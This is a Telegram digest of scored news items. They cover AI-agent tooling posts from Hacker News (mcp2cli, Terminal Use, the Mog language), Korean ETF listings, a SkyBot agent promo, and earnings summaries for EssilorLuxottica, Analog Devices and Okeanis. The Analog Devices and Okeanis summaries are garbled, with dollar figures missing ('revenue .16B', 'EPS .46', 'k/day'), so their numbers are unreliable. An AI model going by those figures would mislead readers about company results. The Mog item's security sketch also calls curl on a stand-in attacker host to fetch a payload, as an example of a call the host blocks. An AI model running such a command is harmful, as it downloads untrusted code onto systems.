260310 Telegram Digest
[8/10] Show HN: Mcp2cli – One CLI for every API, 96-99% fewer tokens than native MCP (141 pts)
Show HN: Mcp2cli – One CLI for every API, 96-99% fewer tokens than native MCP (141 pts) Every MCP server injects its full tool schemas into context on every turn — 30 tools cost ~3,600 tokens/turn whether the model uses them or not. Over 25 turns with 120 tools, that's 362,000 tokens just for schemas.
mcp2cli turns any MCP server or OpenAPI spec into a CLI at runtime. The LLM discovers tools on demand:
mcp2cli --mcp https://mcp.example.com/sse --list # ~16 tokens/tool
mcp2cli --mcp https://mcp.example.com/sse create-task --help # ~120 tokens, once
mcp2cli --mcp https://mcp.example.com/sse create-task --title "Fix bug"
No codegen, no rebuild when the server changes. Works with any LLM — it's just a CLI the model shells out to. Also handles OpenAPI specs (JSON/YAML, local or remote) with the same interface. Token savings are real, measured with cl100k_base: 96% for 30 tools over 15 turns, 99% for 120 tools over 25 turns.
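The arithmetic behind those headline numbers can be sketched directly from the per-call figures in the post. A minimal model, with the caveat that the per-tool token counts are the post's estimates and `tools_used` is an assumption (the post doesn't say how many tools a session actually touches):

```python
# Back-of-envelope model of the token savings claimed above. Per-tool figures
# come from the post's examples; tools_used is an assumed parameter.
SCHEMA_TOKENS_PER_TOOL = 120  # ~3,600 tokens/turn for 30 tools => ~120 each
LIST_TOKENS_PER_TOOL = 16     # one line of `--list` output per tool
HELP_TOKENS = 120             # one `--help` call per tool, paid once

def native_mcp_cost(tools: int, turns: int) -> int:
    """Native MCP: every tool schema is re-injected on every turn."""
    return tools * SCHEMA_TOKENS_PER_TOOL * turns

def cli_cost(tools: int, tools_used: int) -> int:
    """mcp2cli: one --list for discovery, then --help once per tool used."""
    return tools * LIST_TOKENS_PER_TOOL + tools_used * HELP_TOKENS

native = native_mcp_cost(tools=120, turns=25)  # 360,000 tokens
cli = cli_cost(tools=120, tools_used=5)        # 1,920 + 600 = 2,520 tokens
print(f"savings: {1 - cli / native:.0%}")      # ~99%, matching the post
```

The same model gives roughly 98% for 30 tools over 15 turns, in the ballpark of the measured 96%; the measured figures also include prompt overhead this sketch ignores.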
It also ships as an installable skill for AI coding agents (Claude Code, Cursor, Codex): npx skills add knowsuchagency/mcp2cli --skill mcp2cli
Inspired by Kagan Yilmaz's CLI vs MCP analysis and CLIHub.
https://github.com/knowsuchagency/mcp2cli agent_orchestration llm agent claude code mcp server
Score: 8/10 (tags: mcp, claude code, claude)
[7/10] Launch HN: Terminal Use (YC W26) – Vercel for filesystem-based agents (93 pts)
Launch HN: Terminal Use (YC W26) – Vercel for filesystem-based agents (93 pts) Hello Hacker News! We're Filip, Stavros, and Vivek from Terminal Use (https://www.terminaluse.com/). We built Terminal Use to make it easier to deploy agents that work in a sandboxed environment and need filesystems to do work. This includes coding agents, research agents, document processing agents, and internal tools that read and write files.
Here's a demo: https://www.youtube.com/watch?v=ttMl96l9xPA.
Our biggest pain point with hosting agents was that you'd need to stitch together multiple pieces: packaging your agent, running it in a sandbox, streaming messages back to users, persisting state across turns, and moving files to and from the agent workspace.
We wanted something like Cog from Replicate, but for agents: a simple way to package agent code from a repo and serve it behind a clean API/SDK. We wanted to provide a protocol to communicate with your agent, but not constrain the agent logic or harness itself.
On Terminal Use, you package your agent from a repo with a config.yaml and Dockerfile, then deploy it with our CLI. You define the logic of three endpoints (on_create, on_event, and on_cancel) which track the lifecycle of a task (conversation). The config.yaml contains details about resources, build context, etc.
Out of the box, we support Claude Agent SDK and Codex SDK agents. By support, we mean that we have an adapter that converts from the SDK message types to ours. If you'd like to use your own custom harness, you can convert and send messages with our types (Vercel AI SDK v6 compatible). For the frontend, we have a Vercel AI SDK provider that lets you use your agent with Vercel's AI SDK, and a messages module so that you don't have to manage streaming and persistence yourself.
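As a concrete picture of the three-endpoint lifecycle, here's a minimal sketch in Python. The handler names come from the post; the signatures, types, and return shapes are invented for illustration and will differ from the real SDK:

```python
# Hypothetical shape of an agent packaged for the platform: three handlers
# tracking a task (conversation) lifecycle. Signatures are illustrative only.
from dataclasses import dataclass, field

@dataclass
class Task:
    task_id: str
    events: list = field(default_factory=list)
    cancelled: bool = False

def on_create(task_id: str) -> Task:
    # Runs once when a task starts: set up workspace state here.
    return Task(task_id=task_id)

def on_event(task: Task, event: dict) -> dict:
    # Runs per incoming event/turn: invoke your harness, stream messages back.
    if task.cancelled:
        return {"status": "cancelled"}
    task.events.append(event)
    return {"status": "ok", "turn": len(task.events)}

def on_cancel(task: Task) -> None:
    # Runs when the user aborts: stop work, leave the filesystem consistent.
    task.cancelled = True
```

The point of the shape is that the platform owns transport and persistence; your code only fills in what happens at each lifecycle step.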
The part we think is most different is storage.
We treat filesystems as first-class primitives, separate from the lifecycle of a task. That means you can persist a workspace across turns, share it between different agents, or upload/download files independent of the sandbox being active. Further, our filesystem SDK provides presigned URLs, which let your users upload and download files directly, so you don't need to proxy file transfers through your backend.
Because agent logic and filesystem storage are decoupled, it's easy to iterate on your agents without worrying about the files in the sandbox: if you ship a bug, you can deploy a fix and auto-migrate all your tasks to the new deployment. If you make a breaking change, you can specify that existing tasks stay on the existing version and only new tasks use the new one.
We're also adding support for multi-filesystem mounts with configurable mount paths and read/write modes, so storage stays durable and reusable while mount layout stays task-specific.
On the deployment side, we've been influenced by modern developer platforms: simple CLI deployments, preview/production environments, git-based environment targeting, logs, and rollback. All the configuration you need to build, deploy, and manage resources for your agent lives in the config.yaml file, which makes it easy to build and deploy your agent in CI/CD pipelines.
Finally, we've explicitly designed our platform for your CLI coding agents to help you build, test, & iterate with your agents. With our CLI, your coding agents can send messages to your deployed agents, and download filesystem contents to help you understand your agent's output. A common way we test our agents is that we make markdown files with user scenarios we'd like to test, and then ask Claude Code to impersonate our users and chat with our deployed agent.
What we do not have yet: full parity with general-purpose sandbox providers. For example, preview URLs and lower-level sandbox.exec(...) style APIs are still on the roadmap.
We're excited to hear any thoughts, insights, questions, and concerns in the comments below! agent_orchestration llm agent claude code
Score: 7/10 (tags: claude code, claude)
[6/10] Show HN: The Mog Programming Language (126 pts) Hi, Ted here, creator of Mog.
Show HN: The Mog Programming Language (126 pts) Hi, Ted here, creator of Mog.
- Mog is a statically typed, compiled, embedded language (think statically typed Lua) designed to be written by LLMs -- the full spec fits in 3,200 tokens.
- An AI agent writes a Mog program, compiles it, and dynamically loads it as a plugin, script, or hook.
- The host controls exactly which functions a Mog program can call (capability-based permissions), so permissions propagate from agent to agent-written code.
- Compiled to native code for low-latency plugin execution -- no interpreter overhead, no JIT, no process startup cost.
- The compiler is written in safe Rust so the entire toolchain can be audited for security. Even without a full security audit, Mog is already useful for agents extending themselves with their own code.
- MIT licensed, contributions welcome.
Motivations for Mog:
1. Syntax Only an AI Could Love: Mog is written for AIs to write, so the spec fits easily in context (~3,200 tokens), and it's intended to minimize foot-guns and lower the error rate when generating Mog code. This is why Mog has no operator precedence: expressions that mix operators have to use explicit parentheses, e.g. (a + b) * c. It's also why there's no implicit type coercion, which I've found over the decades to be an annoying source of runtime bugs. Mog also has only limited support for generics, and there's absolutely no support for metaprogramming, macros, or syntactic abstraction.
When asking people to write code in a language, these restrictions could be onerous. But LLMs don't care, and the less expressivity you trust them with, the better.
2. Capability-Based Permissions: There's a paradox with existing security models for AI agents. If you give an agent like OpenClaw unfettered access to your data, that's insecure and you'll get pwned. But if you sandbox it, it can't do most of what you want. Worse, if you run scripts the agent wrote, those scripts don't inherit the permissions that constrain the agent's own bash tool calls, which leads to pwnage and other chaos. And that's not even assuming you run one of the many OpenClaw plugins with malware.
Mog tries to solve this by taking inspiration from embedded languages. It compiles all the way to machine code, ahead of time, but the compiler doesn't output any dangerous code (at least it shouldn't -- Mog is quite new, so that could still be buggy). This allows a host program, such as an AI agent, to generate Mog source code, compile it, and load it into itself using dlopen(), while maintaining security guarantees.
The main trick is that a Mog program on its own can't do much. It has no direct access to syscalls, libc, or memory. It can basically call functions, do heap allocations (but only within the arena the host gives it), and return something. If the host wants the Mog program to be able to do I/O, it has to supply the functions that the Mog program will call. A core invariant is that a Mog program should never be able to crash the host program, corrupt its state, or consume more resources than the host allows.
This allows the host to inspect the arguments to any potentially dangerous operation that the Mog program attempts, since it's code that runs in the host. For example, a host agent could give a Mog program a function to run a bash command, then enforce its own session-level permissions on that command, even though the command was dynamically generated by a plugin that was written without prior knowledge of those permission settings.
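The pattern generalizes beyond Mog. Here's the same idea sketched in Python rather than Mog (the allow-list, function names, and policy are invented for illustration; Mog's real host API is different): the guest has no ambient authority, it can only call functions the host hands it, and the host inspects arguments before anything dangerous runs.

```python
# Capability-style injection, sketched: the "plugin" can only reach I/O
# through host-supplied functions, and the host checks arguments first.
# The allow-list and names are hypothetical stand-ins for session policy.
import shlex
import subprocess

ALLOWED_COMMANDS = {"ls", "cat", "grep"}  # stand-in for session permissions

def make_run_command():
    def run_command(cmd: str) -> str:
        argv = shlex.split(cmd)
        if not argv or argv[0] not in ALLOWED_COMMANDS:
            raise PermissionError(f"command not permitted by host policy: {cmd}")
        # Exec the argv directly (no shell) so the check can't be bypassed
        # with `;` or `$(...)` tricks.
        return subprocess.run(argv, capture_output=True, text=True).stdout
    return run_command

def guest_program(run_command):
    # The guest can call only what it was given; this call is denied.
    return run_command("curl http://evil.example/payload")
```

The design choice worth noting is that the check lives in host code, so the policy can change per session without the plugin knowing anything about it.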
(There are a couple other tricks that PL people might find interesting. One is that the host can limit the execution time of the guest program. It does this using cooperative interrupt polling, i.e. the compiler inserts runtime checks that check if the host has asked the guest to stop. This causes a roughly 10% drop in performance on extremely tight loops, which are the worst case. It could almost certainly be optimized.)
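The polling scheme is easy to picture outside the compiler. A minimal Python model (the flag name and the check-per-iteration granularity are invented; in Mog the compiler emits the check in native code at loop back-edges):

```python
# Cooperative interrupt polling, simulated: the host flips a flag (possibly
# from another thread), and the guest loop tests it at every back-edge, the
# way the compiler-inserted runtime checks would in compiled Mog code.
import threading

stop_requested = threading.Event()  # set by the host to interrupt the guest

def guest_loop(iterations: int) -> int:
    completed = 0
    for _ in range(iterations):
        if stop_requested.is_set():  # the compiler-inserted check
            break
        completed += 1
    return completed
```

In native code each check is roughly a load plus a conditional branch per iteration, which is where the ~10% worst-case figure on extremely tight loops comes from.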
3. Self Modification Without Restart: When I try to modify my OpenClaw from my phone, I have to restart the whole agent. Mog fixes this: an agent can compile and run new plugins without interrupting a session, which makes it dynamically responsive to user feedback (e.g., you tell it to always ask you before deleting a file and without any interruption it compiles and loads the code to... actually do that).
Async support is built into the language by adapting LLVM's coroutine lowering to our Rust port of the QBE compiler, which is what Mog uses for compilation. The Mog host library can be slotted into an async event loop (tested with Bun), so Mog async calls get scheduled seamlessly by the agent's event loop. Another trick is that the Mog program uses a stack inside the memory arena the host provides, rather than the system stack, with a guard page between the stack and the heap. This design stops a stack overflow from corrupting host memory, without runtime overhead.
Lots of work still needs to be done to make Mog a "batteries-included" experience like Python. Most of that work involves fleshing out a standard library to include things like JSON, CSV, SQLite, and HTTP. One high-impact addition would be an llm library that lets the guest make LLM calls through the agent; it should support multiple models and token budgeting, so the host could prevent the plugin from burning too many tokens.
I suspect we'll also want to do more work to make the program lifecycle operations more ergonomic. And finally, there should be a more fully featured library for integrating a Mog host into an AI agent like OpenClaw or OpenAI's Codex CLI. agent_orchestration llm agent openclaw
Score: 6/10 (tags: openclaw)
[8/10] KoAct KOSDAQ Active and TIME KOSDAQ Active: new ETF listings (2026-03-10)
1. KoAct KOSDAQ Active and TIME KOSDAQ Active newly listed (2026-03-10). Both ETFs are actively managed against the KOSDAQ index as their benchmark, aiming for excess returns over KOSDAQ, with supply/demand momentum expected from the government's KOSDAQ stimulus policy.
2. KoAct invests broadly, on a momentum basis, across growth sectors such as semiconductors, robotics, aerospace, bio, and secondary batteries (total expense ratio 0.50%; 57 holdings in the listing-day portfolio).
3. TIME builds a core-satellite portfolio screened on financial soundness and profitability, concentrated in secondary batteries and bio (total expense ratio 0.70%; 50 holdings in the listing-day portfolio).
Score: 8/10 (tags: etf, sector, portfolio)
[8/10] Smart-glasses leader EssilorLuxottica earnings review [EL.FR]
Smart-glasses leader EssilorLuxottica earnings review [EL.FR]

FY25 Results
= Revenue €28.49B (est. €28.06B), YoY +7%
= GPM 60.6% (est. 62.3%), YoY -2.9%p
= OPM 15.6% (est. 15.9%), YoY -1.0%p
= EPS €6.79 (est. €6.85) *P/E = 34.8x
= OCF €5.29B (est. €5.28B)
= CAPEX €1.53B (est. €1.58B)
= AI glasses: over 7 million units sold per year

Guidance
The company expects revenue and operating profit to grow in step ("Broadly Aligned Growth") over the next five years, meaning it is moving from an early investment phase into a profit-acceleration phase with economies of scale. 2026 is off to a strong start, with January revenue up double digits. However, the annualization of US tariff effects and the current strong-euro (weak-dollar) environment are expected to put some downward pressure on results. For H2 2026 the company plans to open new revenue streams with a substantially improved second-generation hearing-assist glasses (Nuance Audio) and an expanded next-generation AR glasses lineup.

Review
These are the results released last week, on 2/11. In one line: AI-glasses revenue is rapidly growing as a share of the mix, but margins are below expectations. Improving margins first requires higher volumes. Essilor currently produces 10 million AI glasses a year, and last month Bloomberg reported plans to expand capacity 2-3x. The company's response was that its modernized plant in China and large production base in Thailand are ready for immediate expansion; in other words, it is sticking to its stance of scaling capacity to demand. Essilor directly operates 18,000 DTC stores. Management says customers visit its stores to buy AI glasses, and even when AI glasses are out of stock, a high share convert to regular eyeglass or sunglass purchases. With sales channels and production sites secured, the company just needs demand to follow. According to Essilor, its AI-glasses distribution network is two years ahead of competitors'. Note that AI glasses are highly profitable at the product level not just because of the high unit price but because they pull in add-on component purchases: AI glasses can be fitted with prescription and photochromic lenses, and buyers adopt prescription lenses at about 20% and photochromic lenses at 40-50%. It's effectively an upsell effect, showing that AI glasses are a very high revenue-per-user product. Beyond AI glasses, the myopia-control lens 'Stellest' is another growth axis: Stellest revenue grew 22% YoY last year. It gained traction faster in China, where the company's goal is for 20% of Chinese children to wear Stellest. In the US, after FDA approval in September 2025, it is now stocked in more than 4,000 stores.
Source: https://t.me/d_ticker
Score: 8/10 (tags: earnings, performance)
[7/10] [Cloud-based 24/7 AI assistant SkyBot]
[Cloud-based 24/7 AI assistant SkyBot] Sharing recent news from Skywork, which has already been building projects under the banner of work-focused AI agents 😉 With OpenClaw's arrival the barrier to agents feels a bit lower, so SkyBot is worth a look too 👍

✅ SkyBot at a glance
- A vision-based agent that looks at the screen and operates the mouse and keyboard
- Users issue commands and automate tasks directly through Telegram and WhatsApp
- With autonomous control, it can proceed on its own up to the step just before payment
- Core features such as a browsing agent (Web Agent) and a desktop operator (OS Agent) carry out user requests on the web and in Windows/Mac environments
- Automates users' repetitive workflows and turns them into routines
- Where sensitive information is entered, it stops screen capture or processes data locally only, building a strong security mode

The big difference from OpenClaw is that it's cloud-based, so it can be used immediately with no installation, and it notably resolves much of the security concern 🔥🔥 It also touts low latency as a strength, reportedly operating as smoothly as an actual human at the controls 💯

🤔 There's a lot of talk that 2026 is the year of agents. More agent-style models like this will keep appearing, and watching who ends up dominating this market will be part of the fun ⚡️

👉 Original post: https://x.com/Skywork_ai/status/2020834079953064394
Source: https://x.com/Skywork_ai/status/2020834079953064394
Score: 7/10 (tags: automation, openclaw)
[7/10] Analog Devices earnings: ADI 1Q FY26
Analog Devices earnings: ADI 1Q FY26 revenue .16B (est. .12B), OPM 45.5% (est. 43.6%), EPS .46 (est. .31). 2Q FY26 guidance: revenue .5B (est. .2B), OPM 47.5% (est. 44.6%), EPS .88 (est. .46). Record quarterly revenue for the A&D segment; ATE growth 40%+ YoY; portfolio mix: automotive around 25%, roughly 60% exposure to A&D + ATE + data center; price increases contributed about one-third of revenue growth.
Source: https://t.me/d_ticker
Score: 7/10 (tags: portfolio, earnings)
[6/10] Okeanis Eco Tankers Corp. (ECO) earnings call summary
Okeanis Eco Tankers Corp. (ECO) earnings call summary: 4Q25 fleet TCE k/day, VLCC k, Suezmax k; adjusted EBITDA M; adjusted net profit M; adjusted EPS .78; full-year TCE revenue .4M; full-year EBITDA M; full-year net profit M; cash .5M; total debt M (+M in additional borrowing); book leverage 46%; net LTV 35%. As of 1Q26, VLCC 67% fixed at .2k/day, Suezmax 64% fixed at .6k/day, fleet average about .8k/day. 12-month TC example: .14k/day. Roughly 156 VLCCs under Synacor's integrated operation; over 20% of sanctioned vessels sidelined. 15 consecutive quarters of dividends, quarterly dividend .55; last four quarters' dividends total .32. Capital raising: two offerings totaling M. Effective discounts applied to vessel purchase prices. Strategy going forward: shareholder returns first; no expansion of long-term contracts (to be revisited later); no plans to sell Synacor vessels; maintain spot exposure; view that the market is in the early stage of an upturn; possible structural shortage of vessel supply.
Score: 6/10 (tags: dividend)